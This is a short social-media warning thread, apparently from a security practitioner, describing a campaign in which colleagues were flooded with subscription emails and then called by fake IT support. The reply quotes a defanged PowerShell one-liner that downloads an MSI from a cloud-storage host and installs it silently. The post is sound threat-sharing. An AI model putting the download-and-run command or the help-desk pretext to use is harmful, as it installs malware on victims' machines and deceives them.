Elektrine lite

← Feed

@realn2s@infosec.exchange

2026-09-28 12:35 UTC

Little warning regarding of a social technical attack. At least three collogues were targeted. Th criminals start with a newsletter subscription bomb. Several thousand emails were sent to the users in a very short timeframe. And as these are "valid" subscription emails the e-mail filter only blocked a small subset. #Cyberattack #SocialEngineering

Replies (1)

  • @realn2s@infosec.exchange 2026-09-28 12:50

    A short while later they got contacted through team by someone claiming to be from IT support. WHile this isn't a new pattern it is very mean and I guess reasonable effective. Imagin, you are drowning in spam, suddenly you get a call, offering to help you solving your problem! IN the stress and mental overload situation there is a good chance that you gratefully accept the "help" . Initially the attackers tried to trick the victims to enable remote access. Later they switched to trying to get the victims to download and install a MSI via a PowerSHell command iwr -Uri "hxxps[://]linkupd3[.]blob[.]core[.]windows[.]net/upd/hotfix_v2[.]6[.]msi" -OutFile "$env:USERPROFILE\downloads\update_v2.6[.]msi";msiexec[.]exe /i "$env:USERPROFILE\downloads\update_v2.6[.]msi" /qn Again, the two commands are looking like a single command. And the download happens from Microsoft infrastructure which make it look legit. (the file is no longer available) #SocialEngineering

    Open ##4883665